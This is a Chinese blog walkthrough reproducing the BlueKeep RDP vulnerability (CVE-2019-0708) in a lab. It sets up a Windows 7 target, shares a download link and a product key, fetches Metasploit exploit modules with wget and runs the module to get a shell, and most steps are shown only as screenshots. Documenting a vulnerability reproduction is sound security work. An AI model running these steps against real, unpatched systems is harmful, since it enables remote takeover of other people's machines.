2019输入序列号闪退_CVE-2019-0708 BlueKeep远程桌面代码执行漏洞复现

1、前言

CVE-2019-0708 远程桌面代码执行漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过入RDP协议(3389端口)进行连接发送恶意代码到电脑中去。

这个漏洞最早在5月份被曝光了,9月初就有POC代码公布了,一直没有时间实践一下。

2、漏洞影响的系统

  • Windows 7
  • Windows Server 2008 R2
  • Windows Server 2008
  • Windows Sever 2003
  • Windows XP

3、靶机环境搭建

本次复现的靶机环境为 Windows 7 SP1的旗舰版

靶机下载:

链接: https://pan.baidu.com/s/14aSIZgOebdLmeI2l9lGx_w 提取码: bw7m 

e4901044d568ca5ddcfbc50f2c90924d.png

升级一下系统版本

1b5190d3c2ce6167111273ca4b3ed3f1.png

输入序列号:

6K2KY-BFH24-PJW6W-9GK29-TMPWP

开启远程桌面服务

df332075ca9255dd42f5bb4fa97475df.png

e046306e534bb385a5fbadbff5d49d28.png

查看靶机IP地址

a40d44eb30cc250cb052a861536c96df.png

4、攻击机Kali2019配置

下载POC攻击代码

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb 

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb 

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb 

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

593f0133c12b2f5041f3964bbb87f8a9.png

将POC复制到msf中对应的路径

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_0708_bluekeep_rce.rb usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

文件夹不存在的,需要手工添加

3289867ed48da425e976b5e7c449739f.png

5、漏洞利用

启动msf,使用reload_all重新加载0708的利用模块

701c764e8ffc441c9f6184d8d9237abb.png

探测目标端口,开放3389端口

4b3b6305abe6a2d93e52b37673abd657.png

搜寻bluekeep利用模块

b979c307f401ee24b210eeb6bea071a9.png

使用exp攻击利用模块

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

查看options

2558c06f14449b6d548899a1feb195b7.png

配置靶机IP

640471c5ffd564e16070dc4333982611.png

查看target,设置target为3

368b6fa296ce5e6e225a762ff53e54b6.png

开始攻击

432e217da3d5edc29f43092dcd2f0474.png

就这么简单地成功获得了shell。

在复现过程中可能会出现导致靶机蓝屏重启,没办法获取shell,多试几次就行

e21d66c8214e13ceb8ef4eca92905f2c.png
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值